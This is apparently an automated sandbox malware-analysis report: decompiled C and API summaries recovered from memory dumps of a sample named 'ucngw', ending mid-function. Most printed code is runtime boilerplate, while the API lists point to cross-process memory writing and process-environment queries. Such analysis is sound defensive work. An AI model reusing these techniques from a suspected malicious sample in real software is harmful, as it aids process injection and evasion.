    0x10014935
    0x10014940
    0x1001494b
    0x10014956
    0x1001495a
    0x1001495d
    0x10014968
    0x1001497e
    0x1001496a
    0x1001496a
    0x10014972
    0x10014976
    0x10014976
    0x10014986
    0x1001498b
    0x10014991
    0x10014997
    0x1001499f
    0x00000000
    0x00000000
    0x00000000
    0x1001499f
    0x10014940
    0x00000000
    0x10014933
    0x00000000
    0x00000000
    0x100149ae
    0x100149b2
    0x100149b3
    0x100149b7
    0x100149bb
    0x100149c0
    0x100149c5
    0x00000000
    0x100149cb
    0x100149cb
    0x100149d2
    0x100149d6
    0x100149da
    0x100149de
    0x100149e4
    0x100149f2
    0x00000000
    0x100149f8
    0x100149f8
    0x100149ff
    0x10014a03
    0x10014a06
    0x10014a0b
    0x100149a1
    0x100149ad
    0x10014a0d
    0x10014a0d
    0x10014a14
    0x10014a18
    0x10014a1c
    0x10014a22
    0x10014a26
    0x10014a2a
    0x10014a33
    0x10014a3a
    0x10014a40
    0x10014a47
    0x10014a4b
    0x10014a4f
    0x10014a53
    0x10014a5a
    0x10014a5e
    0x10014a62
    0x10014a6b
    0x10014a6f
    0x10014a75
    0x10014a7b
    0x10014a7d
    0x10014a81
    0x10014a85
    0x10014a8c
    0x10014a90
    0x10014a94
    0x10014aa4
    0x10014aa6
    0x10014aaa
    0x10014aaf
    0x10014ab0
    0x10014ab4
    0x10014ab7
    0x10014ab7
    0x10014abd
    0x10014abd
    0x10014a7b
    0x10014ac3
    0x10014ac7
    0x10014acc
    0x00000000
    0x10014ad2
    0x10014ad2
    0x10014ad4
    0x10014ad5
    0x10014ad6
    0x10014ad7
    0x10014ade
    0x10014ade
    0x00000000
    0x10014acc
    0x00000000
    0x10014a14
    0x10014a0b
    0x100149f2
    0x00000000
    0x00000000
    0x10014bac
    0x00000000
    0x00000000
    0x10014adf
    0x10014ae0
    0x10014ae4
    0x10014ae9
    0x10014aee
    0x10014af1
    0x10014af7
    0x10014bb1
    0x10014bbb
    0x10014afd
    0x10014afd
    0x10014b01
    0x10014b05
    0x10014b07
    0x10014b0e
    0x00000000
    0x10014b14
    0x10014b14
    0x10014b19
    0x10014b1c
    0x10014b1e
    0x10014b22
    0x10014b26
    0x10014b26
    0x10014b29
    0x10014b2d
    0x10014b2f
    0x10014b33
    0x10014b33
    0x10014b37
    0x10014b39
    0x10014b3e
    0x10014b40
    0x10014b45
    0x10014b4b
    0x10014b4e
    0x10014b53
    0x10014b59
    0x10014b60
    0x10014b64
    0x10014b6c
    0x10014b75
    0x10014b77
    0x10014b77
    0x10014b7d
    0x10014b81
    0x10014b82
    0x10014b8b
    0x00000000
    0x00000000
    0x00000000
    0x10014b8b
    0x10014b8d
    0x10014b91
    0x10014b92
    0x10014b93
    0x10014b94
    0x10014b9b
    0x10014b9b
    0x10014b0e
    0x00000000
    0x00000000
    0x10014908
    0x00000000

    APIs
      • Part of subcall function 100145E0: GetCurrentProcess.KERNEL32(00000001,00001DB1), ref: 100145F5
      • Part of subcall function 100145E0: NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,?), ref: 10014630
      • Part of subcall function 100145E0: RtlGetCurrentPeb.NTDLL ref: 1001466D
    • RtlInitUnicodeString.NTDLL(?,00000000), ref: 10014B53
      • Part of subcall function 100144D0: LocalAlloc.KERNEL32(00000040,00000018,10012590), ref: 10014539
      • Part of subcall function 100144D0: LocalAlloc.KERNEL32(00000040,00000108), ref: 1001457A
      • Part of subcall function 100144D0: LocalFree.KERNEL32(?), ref: 100145A9
      • Part of subcall function 100144D0: LocalFree.KERNEL32(?), ref: 100145BC
      • Part of subcall function 100144D0: LocalFree.KERNEL32(?), ref: 100145C6
    • LocalFree.KERNEL32(?), ref: 10014976
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 10014059
      • Part of subcall function 10014010: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1001407C
      • Part of subcall function 10014010: WriteProcessMemory.KERNEL32(?,1001F2D0,?,?,00000000), ref: 100140A2
      • Part of subcall function 10014010: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,10014919,000CAA50), ref: 100140B9
      • Part of subcall function 10014010: LocalFree.KERNEL32(?,10012590), ref: 100140F3
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,?,?), ref: 10014120
      • Part of subcall function 10014010: ReadFile.KERNEL32(?,1001F2D0,?,?,00000000), ref: 10014140
      • Part of subcall function 10014010: ReadProcessMemory.KERNELBASE(?,?,1001F2D0,?,00000000), ref: 1001415F
    • LocalAlloc.KERNEL32(00000040,?), ref: 10014A6F
    • LocalFree.KERNEL32(?), ref: 10014B77
      • Part of subcall function 100146E0: LocalFree.KERNEL32(?,?,?,10014AAF), ref: 100146FE
    • LocalFree.KERNEL32(?), ref: 10014ABD
      • Part of subcall function 100147C0: NtQuerySystemInformation.NTDLL(00000005,00000000,00000000,00000000), ref: 100147D8
      • Part of subcall function 100147C0: LocalAlloc.KERNEL32(00000040,00001000,-00000FFF,?,00000001,C0000225,1001477C,?,00000000,C0000225,?,1001268A,?,00000001), ref: 100147F3
      • Part of subcall function 100147C0: NtQuerySystemInformation.NTDLL(00000005,00000000,00001000,00000000), ref: 10014804
      • Part of subcall function 100147C0: LocalFree.KERNEL32(00000001,?,00000000,C0000225,?,1001268A,?,00000001), ref: 10014812
      • Part of subcall function 10014D30: LocalAlloc.KERNEL32(00000040,DF801001,1001A7A0,?,10014B45), ref: 10014D5A
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 00C54A22, Relevance: 7.7, APIs: 5, Instructions: 222
    C-Code - Quality: 96%
    			E00C54A22(void* __edx, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				int _v20;
				int _v24;
				char* _v28;
				int _v32;
				char _v36;
				intOrPtr _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t59;
				char* _t61;
				intOrPtr _t63;
				int _t64;
				intOrPtr* _t65;
				signed int _t68;
				intOrPtr* _t71;
				short* _t73;
				int _t74;
				int _t76;
				char _t78;
				short* _t83;
				short _t85;
				int _t90;
				char* _t96;
				int _t101;
				char* _t103;
				void* _t104;
				intOrPtr _t106;
				intOrPtr _t107;
				int _t108;
				short* _t110;
				int _t111;
				signed int _t112;

				_t104 = __edx;
				_t59 =  *0xc6a004; // 0x26d30358
				_v8 = _t59 ^ _t112;
				_t61 = _a4;
				_t90 = _a12;
				_t111 = 0;
				_v28 = _t61;
				_v20 = 0;
				_t110 = _a8;
				_v24 = _t110;
				if(_t61 == 0 || _t90 != 0) {
					if(_t110 != 0) {
						E00C5499F(_t90,  &_v48, _t104, _a16);
						_t96 = _v28;
						if(_t96 == 0) {
							_t63 = _v44;
							if( *((intOrPtr*)(_t63 + 0xa8)) != _t111) {
								_t64 = WideCharToMultiByte( *(_t63 + 8), _t111, _t110, 0xffffffff, _t111, _t111, _t111,  &_v20);
								if(_t64 == 0 || _v20 != _t111) {
									L55:
									_t65 = E00C56312();
									_t110 = _t110 | 0xffffffff;
									 *_t65 = 0x2a;
									goto L56;
								} else {
									_t53 = _t64 - 1; // -1
									_t110 = _t53;
									L56:
									if(_v36 != 0) {
										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
									}
									goto L59;
								}
							}
							_t68 =  *_t110 & 0x0000ffff;
							if(_t68 == 0) {
								L51:
								_t110 = _t111;
								goto L56;
							}
							while(_t68 <= 0xff) {
								_t110 =  &(_t110[1]);
								_t111 = _t111 + 1;
								_t68 =  *_t110 & 0x0000ffff;
								if(_t68 != 0) {
									continue;
								}
								goto L51;
							}
							goto L55;
						}
						_t106 = _v44;
						if( *((intOrPtr*)(_t106 + 0xa8)) != _t111) {
							if( *((intOrPtr*)(_t106 + 4)) != 1) {
								_t110 = WideCharToMultiByte( *(_t106 + 8), _t111, _t110, 0xffffffff, _t96, _t90, _t111,  &_v20);
								if(_t110 == 0) {
									if(_v20 != _t111 || GetLastError() != 0x7a) {
										L45:
										_t71 = E00C56312();
										_t111 = _t111 | 0xffffffff;
										 *_t71 = 0x2a;
										goto L51;
									} else {
										if(_t90 == 0) {
											goto L56;
										}
										_t73 = _v24;
										while(1) {
											_t107 = _v44;
											_t101 =  *(_t107 + 4);
											if(_t101 > 5) {
												_t101 = 5;
											}
											_t74 = WideCharToMultiByte( *(_t107 + 8), _t111, _t73, 1,  &_v16, _t101, _t111,  &_v20);
											_t90 = _a12;
											_t108 = _t74;
											if(_t108 == 0 || _v20 != _t111 || _t108 < 0 || _t108 > 5) {
												goto L55;
											}
											if(_t110 + _t108 > _t90) {
												goto L56;
											}
											_t76 = _t111;
											_v32 = _t76;
											if(_t108 <= 0) {
												L43:
												_t73 = _v24 + 2;
												_v24 = _t73;
												if(_t110 < _t90) {
													continue;
												}
												goto L56;
											}
											_t103 = _v28;
											while(1) {
												_t78 =  *((intOrPtr*)(_t112 + _t76 - 0xc));
												 *((char*)(_t103 + _t110)) = _t78;
												if(_t78 == 0) {
													goto L56;
												}
												_t76 = _v32 + 1;
												_t110 =  &(_t110[0]);
												_v32 = _t76;
												if(_t76 < _t108) {
													continue;
												}
												goto L43;
											}
											goto L56;
										}
										goto L55;
									}
								}
								if(_v20 != _t111) {
									goto L45;
								}
								_t28 = _t110 - 1; // -1
								_t111 = _t28;
								goto L51;
							}
							if(_t90 == 0) {
								L21:
								_t111 = WideCharToMultiByte( *(_t106 + 8), _t111, _t110, _t90, _t96, _t90, _t111,  &_v20);
								if(_t111 == 0 || _v20 != 0) {
									goto L45;
								} else {
									if(_v28[_t111 - 1] == 0) {
										_t111 = _t111 - 1;
									}
									goto L51;
								}
							}
							_t83 = _t110;
							_v24 = _t90;
							while( *_t83 != _t111) {
								_t83 =  &(_t83[1]);
								_t16 =  &_v24;
								 *_t16 = _v24 - 1;
								if( *_t16 != 0) {
									continue;
								}
								break;
							}
							if(_v24 != _t111 &&  *_t83 == _t111) {
								_t90 = (_t83 - _t110 >> 1) + 1;
							}
							goto L21;
						}
						if(_t90 == 0) {
							goto L51;
						}
						while( *_t110 <= 0xff) {
							_t96[_t111] =  *_t110;
							_t85 =  *_t110;
							_t110 =  &(_t110[1]);
							if(_t85 == 0) {
								goto L51;
							}
							_t111 = _t111 + 1;
							if(_t111 < _t90) {
								continue;
							}
							goto L51;
						}
						goto L45;
					}
					 *((intOrPtr*)(E00C56312())) = 0x16;
					E00C54E87();
					goto L59;
				} else {
					L59:
					return E00C51252(_t90, _v8 ^ _t112, _t110, _t111);
				}
			}







































    0x00c54a22
    0x00c54a2a
    0x00c54a31
    0x00c54a34
    0x00c54a38
    0x00c54a3c
    0x00c54a3e
    0x00c54a41
    0x00c54a45
    0x00c54a48
    0x00c54a4d
    0x00c54a5c
    0x00c54a7c
    0x00c54a81
    0x00c54a86
    0x00c54c23
    0x00c54c2c
    0x00c54c5e
    0x00c54c66
    0x00c54c72
    0x00c54c72
    0x00c54c77
    0x00c54c7a
    0x00000000
    0x00c54c6d
    0x00c54c6d
    0x00c54c6d
    0x00c54c80
    0x00c54c84
    0x00c54c89
    0x00c54c89
    0x00000000
    0x00c54c90
    0x00c54c66
    0x00c54c2e
    0x00c54c34
    0x00c54c4c
    0x00c54c4c
    0x00000000
    0x00c54c4c
    0x00c54c3b
    0x00c54c40
    0x00c54c43
    0x00c54c44
    0x00c54c4a
    0x00000000
    0x00000000
    0x00000000
    0x00c54c4a
    0x00000000
    0x00c54c3b
    0x00c54a8c
    0x00c54a95
    0x00c54acf
    0x00c54b48
    0x00c54b4c
    0x00c54b62
    0x00c54c13
    0x00c54c13
    0x00c54c18
    0x00c54c1b
    0x00000000
    0x00c54b77
    0x00c54b79
    0x00000000
    0x00000000
    0x00c54b7f
    0x00c54b82
    0x00c54b82
    0x00c54b85
    0x00c54b8b
    0x00c54b8f
    0x00c54b8f
    0x00c54ba1
    0x00c54ba7
    0x00c54baa
    0x00c54bae
    0x00000000
    0x00000000
    0x00c54bd3
    0x00000000
    0x00000000
    0x00c54bd9
    0x00c54bdb
    0x00c54be0
    0x00c54c00
    0x00c54c03
    0x00c54c06
    0x00c54c0b
    0x00000000
    0x00000000
    0x00000000
    0x00c54c11
    0x00c54be2
    0x00c54be5
    0x00c54be5
    0x00c54be9
    0x00c54bee
    0x00000000
    0x00000000
    0x00c54bf7
    0x00c54bf8
    0x00c54bf9
    0x00c54bfe
    0x00000000
    0x00000000
    0x00000000
    0x00c54bfe
    0x00000000
    0x00c54be5
    0x00000000
    0x00c54b82
    0x00c54b62
    0x00c54b51
    0x00000000
    0x00000000
    0x00c54b57
    0x00c54b57
    0x00000000
    0x00c54b57
    0x00c54ad3
    0x00c54af9
    0x00c54b0c
    0x00c54b10
    0x00000000
    0x00c54b20
    0x00c54b28
    0x00c54b2e
    0x00c54b2e
    0x00000000
    0x00c54b28
    0x00c54b10
    0x00c54ad5
    0x00c54ad7
    0x00c54ada
    0x00c54adf
    0x00c54ae2
    0x00c54ae2
    0x00c54ae6
    0x00000000
    0x00000000
    0x00000000
    0x00c54ae6
    0x00c54aeb
    0x00c54af8
    0x00c54af8
    0x00000000
    0x00c54aeb
    0x00c54a99
    0x00000000
    0x00000000
    0x00c54aa4
    0x00c54aaf
    0x00c54ab2
    0x00c54ab5
    0x00c54abb
    0x00000000
    0x00000000
    0x00c54ac1
    0x00c54ac4
    0x00000000
    0x00000000
    0x00000000
    0x00c54ac6
    0x00000000
    0x00c54aa4
    0x00c54a63
    0x00c54a69
    0x00000000
    0x00c54a53
    0x00c54c92
    0x00c54ca2
    0x00c54ca2

    APIs
    • WideCharToMultiByte.KERNEL32(?,00000000,?,?,?,?,00000000,?,?), ref: 00C54B06
    • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,?,?,00000000,?,?), ref: 00C54B42
    • GetLastError.KERNEL32 ref: 00C54B68
    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000001,00000000,?), ref: 00C54BA1
    • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?), ref: 00C54C5E
      • Part of subcall function 00C51252: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C514FE
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 1000D0F4, Relevance: 7.6, APIs: 5, Instructions: 110
    C-Code - Quality: 81%
    			E1000D0F4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0x1001d018; // 0x26c1db24
				_v8 = _t34 ^ _t70;
				E10002F77(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t6 = _v24 + 8; // 0x1be85006
					_t53 =  *_t6;
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E10001B26(_v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E10001E90(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E1000B187(_t69);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E10005DA1(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E10010250();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}




















    0x1000d0fc
    0x1000d103
    0x1000d10f
    0x1000d114
    0x1000d119
    0x1000d11e
    0x1000d11e
    0x1000d121
    0x1000d123
    0x1000d123
    0x1000d128
    0x1000d141
    0x1000d147
    0x1000d14c
    0x1000d1eb
    0x1000d1ef
    0x1000d1f4
    0x1000d1f4
    0x1000d210
    0x1000d210
    0x1000d152
    0x1000d15a
    0x1000d15e
    0x1000d1aa
    0x1000d1ac
    0x1000d1ae
    0x1000d1b3
    0x1000d1ca
    0x1000d1d2
    0x1000d1e2
    0x1000d1e2
    0x1000d1d2
    0x1000d1e4
    0x1000d1e5
    0x00000000
    0x1000d1ea
    0x1000d165
    0x1000d167
    0x1000d169
    0x1000d171
    0x1000d18e
    0x1000d198
    0x1000d19d
    0x00000000
    0x00000000
    0x1000d19f
    0x1000d1a5
    0x1000d1a5
    0x00000000
    0x1000d1a5
    0x1000d175
    0x1000d179
    0x1000d17e
    0x1000d182
    0x00000000
    0x00000000
    0x1000d184
    0x00000000

    APIs
    • MultiByteToWideChar.KERNEL32(?,00000000,1BE85006,100031C9,00000000,00000000,1000405A,00000000,1000405A,?,00000001,100031C9,1BE85006,00000001,1000405A,1000405A), ref: 1000D141
    • __alloca_probe_16.NTDLLP ref: 1000D179
      • Part of subcall function 10005DA1: RtlAllocateHeap.NTDLL(00000000,00000001,00000004,?,1000DDBB,00000001,00000000,?,10009B15,00000001,00000004,00000000,00000001,?,?,10005AA6), ref: 10005DD3
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 1000D1CA
    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 1000D1DC
    • __freea.LIBCMT ref: 1000D1E5
      • Part of subcall function 10001B26: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10001B6A
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 00C52C6F, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104
    C-Code - Quality: 66%
    			E00C52C6F(void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v0;
				char _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr* _v32;
				intOrPtr* _v60;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				void* _t71;
				intOrPtr* _t74;
				intOrPtr* _t78;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr* _t87;
				intOrPtr* _t89;
				signed int _t93;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				char _t101;
				void* _t105;
				intOrPtr _t111;
				char _t114;
				intOrPtr _t116;
				intOrPtr* _t119;
				intOrPtr* _t121;
				intOrPtr* _t123;
				intOrPtr _t129;
				void* _t130;
				intOrPtr* _t131;
				void* _t132;
				signed int* _t136;
				void* _t138;
				void* _t140;
				void* _t141;
				void* _t142;

				_t113 = __edx;
				_push(_t105);
				_push(_t105);
				_t119 = _a4;
				_t143 =  *_t119 - 0x80000003;
				if( *_t119 == 0x80000003) {
					L18:
					return _t70;
				} else {
					_t71 = E00C537A2(_t97, _t105, __edx, _t119, _t130, _t143, _t130, _t97);
					_t98 = _a20;
					_t144 =  *((intOrPtr*)(_t71 + 8));
					if( *((intOrPtr*)(_t71 + 8)) == 0) {
						L6:
						if( *((intOrPtr*)(_t98 + 0xc)) == 0) {
							E00C560DB(_t98, _t105, _t113, _t119, _t130, __eflags);
							asm("int3");
							_t138 = _t140;
							_t141 = _t140 - 0x18;
							_push(_t98);
							_push(_t130);
							_t131 = _v16;
							_push(_t119);
							__eflags = _t131;
							if(__eflags == 0) {
								E00C560DB(_t98, _t105, _t113, _t119, _t131, __eflags);
								asm("int3");
								_push(_t138);
								_push(_t98);
								_push(_t131);
								_push(_t119);
								_t121 = _v60;
								_t132 = 0;
								__eflags =  *_t121;
								if( *_t121 <= 0) {
									L37:
									_t74 = 0;
									__eflags = 0;
								} else {
									_t100 = 0;
									while(1) {
										_t78 = E00C535CE( *((intOrPtr*)(_t100 +  *((intOrPtr*)(_t121 + 4)) + 4)) + 4, 0xc6a98c);
										__eflags = _t78;
										if(_t78 == 0) {
											break;
										}
										_t132 = _t132 + 1;
										_t100 = _t100 + 0x10;
										__eflags = _t132 -  *_t121;
										if(_t132 <  *_t121) {
											continue;
										} else {
											goto L37;
										}
										goto L38;
									}
									_t74 = 1;
								}
								L38:
								return _t74;
							} else {
								_t123 =  *_t131;
								_t101 = 0;
								__eflags = _t123;
								if(_t123 > 0) {
									_t114 = 0;
									_v12 = 0;
									_t82 =  *((intOrPtr*)( *((intOrPtr*)(_v0 + 0x1c)) + 0xc));
									_t83 = _t82 + 4;
									__eflags = _t83;
									_v24 =  *_t82;
									_v32 = _t83;
									do {
										_t109 = _t83;
										_t84 = _v24;
										_v20 = _t83;
										_v16 = _t84;
										__eflags = _t84;
										if(_t84 > 0) {
											_t86 =  *((intOrPtr*)(_t131 + 4)) + _t114;
											__eflags = _t86;
											_v28 = _t86;
											while(1) {
												_t87 = E00C53257(_t86,  *_t109,  *((intOrPtr*)(_v0 + 0x1c)));
												_t141 = _t141 + 0xc;
												__eflags = _t87;
												if(_t87 != 0) {
													break;
												}
												_t89 = _v16 - 1;
												_t109 = _v20 + 4;
												_v16 = _t89;
												__eflags = _t89;
												_v20 = _v20 + 4;
												_t86 = _v28;
												if(_t89 > 0) {
													continue;
												} else {
												}
												L29:
												_t114 = _v12;
												goto L30;
											}
											_t101 = 1;
											goto L29;
										}
										L30:
										_t83 = _v32;
										_t114 = _t114 + 0x10;
										_v12 = _t114;
										_t123 = _t123 - 1;
										__eflags = _t123;
									} while (_t123 != 0);
								}
								return _t101;
							}
						} else {
							_t70 = E00C53A19(_t105, _t98, _a28, _a24,  &_v12,  &_v8);
							_t111 = _v12;
							_t142 = _t140 + 0x14;
							_t116 = _v8;
							if(_t111 < _t116) {
								_t17 = _t70 + 0xc; // 0xc
								_t136 = _t17;
								_t70 = _a24;
								do {
									if(_t70 >=  *((intOrPtr*)(_t136 - 0xc)) && _t70 <=  *((intOrPtr*)(_t136 - 8))) {
										_t93 =  *_t136 << 4;
										if( *((intOrPtr*)(_t136[1] + _t93 - 0xc)) == 0) {
											L13:
											_t94 = _t93 + _t136[1] + 0xfffffff0;
											_t129 = _a4;
											if(( *(_t93 + _t136[1] + 0xfffffff0) & 0x00000040) == 0) {
												_push(1);
												_t35 = _t136 - 0xc; // 0x0
												E00C52842(_t98, _t116, _t136, _t129, _a8, _a12, _a16, _t98, _t94, 0, _t35, _a28, _a32);
												_t116 = _v8;
												_t142 = _t142 + 0x2c;
												_t111 = _v12;
											}
										} else {
											_t116 = _v8;
											_t98 = _a20;
											if( *((char*)( *((intOrPtr*)(_t136[1] + _t93 - 0xc)) + 8)) == 0) {
												goto L13;
											}
										}
										_t70 = _a24;
									}
									_t111 = _t111 + 1;
									_t136 =  &(_t136[5]);
									_v12 = _t111;
								} while (_t111 < _t116);
							}
							goto L17;
						}
					} else {
						__imp__EncodePointer(0);
						_t130 = _t71;
						if( *((intOrPtr*)(E00C537A2(_t98, _t105, __edx, _t119, _t130, _t144) + 8)) == _t130 ||  *_t119 == 0xe0434f4d ||  *_t119 == 0xe0434352) {
							goto L6;
						} else {
							_t70 = E00C5393C(_t119, _a8, _a12, _a16, _t98, _a28, _a32);
							_t140 = _t140 + 0x1c;
							if(_t70 != 0) {
								L17:
								goto L18;
							} else {
								goto L6;
							}
						}
					}
				}
			}
















































    0x00c52c6f
    0x00c52c72
    0x00c52c73
    0x00c52c75
    0x00c52c78
    0x00c52c7e
    0x00c52d7f
    0x00c52d83
    0x00c52c84
    0x00c52c86
    0x00c52c8b
    0x00c52c8e
    0x00c52c92
    0x00c52cd9
    0x00c52cdd
    0x00c52d84
    0x00c52d89
    0x00c52d8b
    0x00c52d8d
    0x00c52d90
    0x00c52d91
    0x00c52d92
    0x00c52d95
    0x00c52d96
    0x00c52d98
    0x00c52e20
    0x00c52e25
    0x00c52e26
    0x00c52e29
    0x00c52e2a
    0x00c52e2b
    0x00c52e2c
    0x00c52e2f
    0x00c52e31
    0x00c52e33
    0x00c52e5a
    0x00c52e5a
    0x00c52e5a
    0x00c52e35
    0x00c52e35
    0x00c52e37
    0x00c52e47
    0x00c52e4e
    0x00c52e50
    0x00000000
    0x00000000
    0x00c52e52
    0x00c52e53
    0x00c52e56
    0x00c52e58
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00c52e58
    0x00c52e61
    0x00c52e61
    0x00c52e5c
    0x00c52e60
    0x00c52d9e
    0x00c52d9e
    0x00c52da0
    0x00c52da2
    0x00c52da4
    0x00c52da9
    0x00c52dab
    0x00c52db1
    0x00c52db6
    0x00c52db6
    0x00c52db9
    0x00c52dbc
    0x00c52dbf
    0x00c52dbf
    0x00c52dc1
    0x00c52dc4
    0x00c52dc7
    0x00c52dca
    0x00c52dcc
    0x00c52dd1
    0x00c52dd1
    0x00c52dd3
    0x00c52dd6
    0x00c52ddf
    0x00c52de4
    0x00c52de7
    0x00c52de9
    0x00000000
    0x00000000
    0x00c52df1
    0x00c52df2
    0x00c52df5
    0x00c52df8
    0x00c52dfa
    0x00c52dfd
    0x00c52e00
    0x00000000
    0x00000000
    0x00c52e02
    0x00c52e06
    0x00c52e06
    0x00000000
    0x00c52e06
    0x00c52e04
    0x00000000
    0x00c52e04
    0x00c52e09
    0x00c52e09
    0x00c52e0c
    0x00c52e0f
    0x00c52e12
    0x00c52e12
    0x00c52e12
    0x00c52dbf
    0x00c52e1f
    0x00c52e1f
    0x00c52ce3
    0x00c52cf2
    0x00c52cf7
    0x00c52cfa
    0x00c52cfd
    0x00c52d02
    0x00c52d04
    0x00c52d04
    0x00c52d07
    0x00c52d0a
    0x00c52d0d
    0x00c52d19
    0x00c52d22
    0x00c52d37
    0x00c52d3d
    0x00c52d3f
    0x00c52d45
    0x00c52d47
    0x00c52d4c
    0x00c52d61
    0x00c52d66
    0x00c52d69
    0x00c52d6c
    0x00c52d6c
    0x00c52d24
    0x00c52d2b
    0x00c52d32
    0x00c52d35
    0x00000000
    0x00000000
    0x00c52d35
    0x00c52d6f
    0x00c52d6f
    0x00c52d72
    0x00c52d73
    0x00c52d76
    0x00c52d79
    0x00c52d0a
    0x00000000
    0x00c52d02
    0x00c52c94
    0x00c52c96
    0x00c52c9c
    0x00c52ca6
    0x00000000
    0x00c52cb8
    0x00c52cc9
    0x00c52cce
    0x00c52cd3
    0x00c52d7d
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00c52cd3
    0x00c52ca6
    0x00c52c92

    APIs
      • Part of subcall function 00C537A2: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C56215
    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,?,?,00C68C4C), ref: 00C52C96
    • _GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 00C52CF2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 10013E20, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 97library
    C-Code - Quality: 94%
    			E10013E20(void* __ecx, void* __eflags) {
				void* _t59;
				void* _t64;
				void* _t69;

				_t69 = __eflags;
				_push(__ecx);
				LoadLibraryW(L"advapi32.dll");
				LoadLibraryW(L"user32.dll");
